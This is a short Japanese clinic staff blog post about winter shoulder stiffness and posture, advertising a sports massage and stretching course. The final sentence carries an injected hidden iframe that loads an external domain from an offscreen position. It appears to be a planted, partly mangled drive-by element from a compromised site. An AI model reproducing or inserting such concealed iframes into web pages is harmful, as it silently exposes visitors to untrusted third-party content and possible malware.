スタッフブログ Staff Blog

月寒 ストレッチ 肩こり 腰痛

こんばんは
ビーグラン トレーナーの高橋涼です!

明日で1月も終わりですね。
今年が始まりはや1ヶ月、体調はいかがでしょうか。

最近は気温も低く、雪が降ることも多くなってきました。

運動教室をしていても肩甲骨周りの筋肉が硬くなっている人や、ストレッチをしていても肩の位置が少し前にズレている人がいたりします。

外を歩く時に寒さで背中を丸め、足元ばかりを見がちになってしまうのでそのような身体になっている方が多いです。
足元は滑るし寒さは厳しいしで、そのような姿勢を変えるのも難しいのですよね。
なので今だからこそ運動習慣やストレッチやマッサージを受け、身体をほぐすことをオススメします!

当院でのオススメは、
スポーツマッサージ&ストレッチングコースで30分1980円と大変お得なコースです!
肩こりや腰痛などの部分的なコリほぐしにもってこいな!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe

コメントを投稿する
※承認されるまではコメントは表示されません。

CAPTCHA


ページ上部へ戻る